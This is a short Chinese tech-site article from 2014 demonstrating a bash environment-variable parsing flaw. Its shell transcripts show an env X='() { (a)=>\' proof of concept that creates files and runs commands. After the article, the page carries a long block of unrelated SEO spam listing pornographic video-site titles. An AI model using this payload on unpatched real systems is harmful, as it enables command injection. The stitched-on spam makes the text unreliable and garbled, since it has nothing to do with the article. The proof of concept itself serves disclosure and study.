《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 性欧美激情videos| 男女一边摸一边做爽的免费视频| 国色天香论坛社区在线视频| 久久久久亚洲av无码专区蜜芽| 欧美黑人巨大videos精| 国产99久9在线视频| 福利视频导航网| 天堂一区二区三区在线观看| 久久久久99人妻一区二区三区| 欧美日韩精品久久久免费观看| 午夜精品在线视频| 日本亚洲精品色婷婷在线影院| 日本免费xxx| 2021日韩麻豆| 翁房中春意浓王易婉艳| 国产精品成人无码免费| 一个人的突击队3电影在线观看 | 中文字幕在线亚洲精品| 欧美亚洲校园第一页| 免费国产剧情视频在线观看| 调教女m视频免费区| 国产精品中文字幕在线观看| ririai66在线观看视频| 无码内射中文字幕岛国片| 五月婷婷丁香久久| 欧美日在线观看| 免费不卡在线观看av| 能看毛片的网站| 国产对白精品刺激一区二区| 18禁裸乳无遮挡啪啪无码免费| 女神校花乳环调教| 中文字幕乱倫视频| 日本在线高清视频日本在线观看成人小视频| 亚洲人成网站18禁止久久影院| 爱情鸟免费论坛二| 午夜视频一区二区| 韩国精品视频在线观看| 国产欧美亚洲精品a第一页| 538在线视频二三区视视频| 女人张开腿给人桶免费视频| 两个小姨子在线观看|